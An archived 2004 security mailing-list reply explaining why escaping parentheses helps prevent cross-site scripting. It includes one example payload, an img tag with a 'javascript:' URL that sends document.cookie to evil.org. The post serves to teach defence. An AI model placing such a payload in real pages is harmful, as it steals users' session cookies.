WebApp Sec mailing list archives
RE: AppSec FAQ at OWASP
From: "Sangita Pakala" <sangita.pakala () paladion net>
Date: Thu, 29 Jan 2004 15:10:35 +0530
Thank you Ulf for the nice words. To address your question:
Why is it important to escape "(", ")" and "#"?
We need to escape these characters to take care of CSS that do not rely on <script> tags. For instance, the "javascript:" construct could be used to embed scripts without using the <script> tag. In the example below, let's say that the user's input is reflected as the value for <img src= >. Now, when the img src= line is encountered, the window.open javascript function is called and the cookie sent to evil.org <img src= "Javascript:window.open('http://www.evil.org?cookie='+document.cookie)"> Escaping the "(" and ")" above renders the function call mute. If someone can point me to a good example for when escaping "#" is reqd, I'd love to hear that. Gunter Ollmann has an excellent article on CSS and special characters at http://www.technicalinfo.net/papers/CSS.html Regards, Sangita. Sangita Pakala Paladion Networks http://www.paladion.net -----Original Message----- From: Ulf Härnhammar [mailto:Ulf.Harnhammar.9485 () student uu se] Sent: Wednesday, January 28, 2004 9:56 PM To: Sangita Pakala Cc: webappsec () securityfocus com Subject: Re: AppSec FAQ at OWASP Nice document! Good work!
XSS can be prevented while coding the application. You should be
validating
all input and output to and from the application and escape all
special
characters that may be used in a script. If the code replaces the
special
characters by the following before displaying the output, XSS can be prevented.
( ( ) ) # #
Why is it important to escape "(", ")" and "#"? -- Ulf Härnhammar student, Uppsala universitet redaktör, idiosynkratisk ( http://labben.abm.uu.se/~ulha9485/idiosynkratisk/ )
Current thread:
- AppSec FAQ at OWASP Sangita Pakala (Jan 28)
- <Possible follow-ups>
- RE: AppSec FAQ at OWASP Sangita Pakala (Jan 29)
- RE: AppSec FAQ at OWASP Ulf Härnhammar (Jan 29)
- Re: AppSec FAQ at OWASP オマル イスマイル (Jan 29)
- Re: AppSec FAQ at OWASP Laurian Gridinoc (Jan 30)